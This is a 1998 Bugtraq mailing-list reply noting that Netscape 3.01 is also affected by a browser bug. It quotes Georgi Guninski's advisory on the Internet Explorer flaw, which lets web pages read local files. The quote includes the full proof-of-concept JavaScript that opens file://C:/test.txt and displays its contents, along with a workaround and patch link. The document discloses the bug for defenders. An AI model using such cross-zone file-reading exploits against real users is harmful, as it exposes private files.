[7888] in bugtraq
Re: IE can read local files
daemon@ATHENA.MIT.EDU (Mike Dion)
Sat Sep 5 13:57:39 1998
Date: Sat, 5 Sep 1998 13:36:29 +0200
Reply-To: robing@TOTAL.NET
From: Mike Dion <robing@TOTAL.NET>
X-To: Georgi Guninski <guninski@USA.NET>
To: BUGTRAQ@NETSPACE.ORG
Netscape Navigator Version 3.01 is vulnerable too...
I didn't test any other netscape versions...
At 04:33 98-09-05 -0400, Georgi Guninski wrote:
>There is a bug in Internet Explorer 3, 4.0, 4.01 (for version information
see Microsoft's info below),
>which allows a specially designed web page to read text or HTML files from
the user's computer
>and send their contents to an arbitrary host, even if the user is behind
firewall. The bug uses Javascript and
>the file name and location must be known.
>
>Another way to exploit this bug is to send a specially designed message to
an Outlook Express/IE4 user.
>
>Demonstration of this is available at:
http://www.geocities.com/ResearchTriangle/1711/good-read.html
>
>Workaround: Disable Javascript.
>Microsoft has released a patch at:
http://www.microsoft.com/security/bulletins/ms98-013.htm
>
>Georgi Guninski
>http://www.geocities.com/ResearchTriangle/1711
>
>The source of the page:
>----Cut here---
><HTML>
><HEAD><TITLE>Read text/HTML file with Internet Explorer 4.01></TITLE></HEAD>
><BODY>
>This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other
versions), which allows reading text or HTML file on the user's machine.
><B>Create the file c:\test.txt</B> and its contents are shown in a message
box. The file may be sent to an arbitrary server even if behind a firewall.
><BR>
>To test it, you need Javascript enabled.
><BR>
>This file is created by <A
HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A>
>
><SCRIPT LANGUAGE="JAVASCRIPT">
>
>alert("This page demonstrates reading the file C:\\test.txt (you may need
to create a short file to view it)");
>
>
>var x=window.open('file://C:/test.txt');
>x.navigate("javascript:eval(\"var
a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);\")
");
>
></SCRIPT>
></BODY>
></HTML>
>
>
>____________________________________________________________________
>Get free e-mail and a permanent address at http://www.netaddress.com/?N=1
>
>
